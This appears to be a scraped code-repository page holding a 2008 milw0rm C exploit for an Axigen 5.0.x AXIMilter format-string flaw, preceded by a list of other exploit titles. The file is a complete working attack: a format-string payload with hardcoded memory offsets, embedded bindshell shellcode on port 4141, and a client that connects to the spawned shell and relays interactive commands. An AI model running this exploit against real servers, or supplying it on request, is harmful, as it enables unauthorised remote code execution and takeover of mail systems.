477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
148 lines
3.6 KiB
C
Executable file
148 lines
3.6 KiB
C
Executable file
/*
|
|
* Axigen 5.0.x AXIMilter Format String Exploit
|
|
*
|
|
* by hempel (JAN 16 2008)
|
|
*
|
|
* thx to mu-b (digit-labs.org)
|
|
*
|
|
*/
|
|
#include <stdio.h>
|
|
#include <netinet/in.h>
|
|
#include <sys/socket.h>
|
|
#include <sys/types.h>
|
|
#include <sys/uio.h>
|
|
#include <unistd.h>
|
|
#include <string.h>
|
|
|
|
char buf[] =
|
|
"FROM:\r\nEHLO:\r\nCNIP:\r\nCNPO:\r\nCNHO: "
|
|
/* offsets */
|
|
"\xb8\x96\x05\x08\xb9\x96\x05\x08\xba\x96\x05\x08\xbb\x96\x05\x08"
|
|
"\xbc\x96\x05\x08\xbd\x96\x05\x08\xbe\x96\x05\x08\xbf\x96\x05\x08"
|
|
"\xc0\x96\x05\x08"
|
|
/* format string */
|
|
"%35u%6851$n%70u%6850$hhn%47u%6846$hhn%36u%6854$hhn%31u%6853$hhn%"
|
|
"17u%6852$hhn%134u%6847$hhn%111u%6848$hhn%259u%6849$hhn"
|
|
"\r\nRCPT:\r\nVERI: "
|
|
/* bindshell code (port 4141) */
|
|
"\x33\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xdc"
|
|
"\xc8\x06\xb7\x83\xeb\xfc\xe2\xf4\xed\x13\x55\xf4\x8f\xa2\x04\xdd"
|
|
"\xba\x90\x9f\x3e\x3d\x05\x86\x21\x9f\x9a\x60\xdf\xcc\xe5\x60\xe4"
|
|
"\x55\x29\x6c\xd1\x84\x98\x57\xe1\x55\x29\xcb\x37\x6c\xae\xd7\x54"
|
|
"\x11\x48\x54\xe5\x8a\x8b\x8f\x56\x6c\xae\xcb\x37\x4f\xa2\x04\xee"
|
|
"\x6c\xf7\xcb\x37\x95\xb1\xff\x07\xd7\x9a\x6e\x98\xf3\xbb\x6e\xdf"
|
|
"\xf3\xaa\x6f\xd9\x55\x2b\x54\xe4\x55\x29\xcb\x37"
|
|
"\r\nPASS:\r\n";
|
|
|
|
static int
|
|
shell_sock (char *host, int port)
|
|
{
|
|
struct sockaddr_in addr;
|
|
int sockfd;
|
|
|
|
sockfd = socket(PF_INET, SOCK_STREAM, 0);
|
|
if (sockfd == -1) {
|
|
perror ("socket");
|
|
return 0;
|
|
}
|
|
|
|
addr.sin_family = AF_INET;
|
|
addr.sin_addr.s_addr = inet_addr(host);
|
|
addr.sin_port = htons(port);
|
|
|
|
if (connect(sockfd, (struct sockaddr *) &addr, sizeof(addr)) == -1) {
|
|
perror ("connect");
|
|
return 0;
|
|
}
|
|
|
|
return sockfd;
|
|
}
|
|
|
|
static void
|
|
shell_run (int sockfd)
|
|
{
|
|
int rs;
|
|
fd_set rset;
|
|
char rbuf[1024], *cmd = "id; uname -a; uptime\n";
|
|
|
|
write(sockfd, cmd, strlen(cmd));
|
|
|
|
while (1) {
|
|
FD_ZERO (&rset);
|
|
FD_SET (sockfd, &rset);
|
|
FD_SET (STDIN_FILENO, &rset);
|
|
|
|
select (sockfd + 1, &rset, NULL, NULL, NULL);
|
|
if (FD_ISSET (sockfd, &rset)) {
|
|
rs = read (sockfd, rbuf, sizeof(rbuf) - 1);
|
|
if (rs <= 0) {
|
|
perror("read");
|
|
return;
|
|
}
|
|
rbuf[rs] = '\0';
|
|
printf ("%s", rbuf);
|
|
}
|
|
|
|
if (FD_ISSET (STDIN_FILENO, &rset)) {
|
|
rs = read(STDIN_FILENO, rbuf, sizeof(rbuf) - 1);
|
|
if (rs > 0) {
|
|
rbuf[rs] = '\0';
|
|
write (sockfd, rbuf, rs);
|
|
}
|
|
}
|
|
}
|
|
}
|
|
|
|
int
|
|
main(int argc, char **argv)
|
|
{
|
|
int sockfd, port, buf_len;
|
|
struct sockaddr_in addr;
|
|
char *host;
|
|
|
|
printf("AXIGEN 5.0.x AXIMilter format string Exploit by hempel\n");
|
|
|
|
if (argc < 2) {
|
|
printf("%s host port\n", *argv);
|
|
return 0;
|
|
}
|
|
|
|
host = argv[1];
|
|
port = atoi(argv[2]);
|
|
|
|
sockfd = socket(PF_INET, SOCK_STREAM, 0);
|
|
if(sockfd == -1) {
|
|
perror("socket");
|
|
return -1;
|
|
}
|
|
|
|
addr.sin_family = AF_INET;
|
|
addr.sin_addr.s_addr = inet_addr(host);
|
|
addr.sin_port = htons(port);
|
|
|
|
if (connect(sockfd, (struct sockaddr *) &addr, sizeof(addr)) == -1) {
|
|
perror("connect");
|
|
return -1;
|
|
}
|
|
|
|
buf_len = sizeof(buf) - 1;
|
|
if (write(sockfd, buf, buf_len) == -1) {
|
|
perror("write");
|
|
return -1;
|
|
}
|
|
close(sockfd);
|
|
|
|
printf("trying shell at %s:4141 ...", host);
|
|
fflush(stdout);
|
|
sockfd = shell_sock(host, 4141);
|
|
if (sockfd) {
|
|
printf("w00t!\n");
|
|
shell_run(sockfd);
|
|
} else {
|
|
printf("nope!\n");
|
|
}
|
|
|
|
return 0;
|
|
}
|
|
|
|
// milw0rm.com [2008-01-21]
|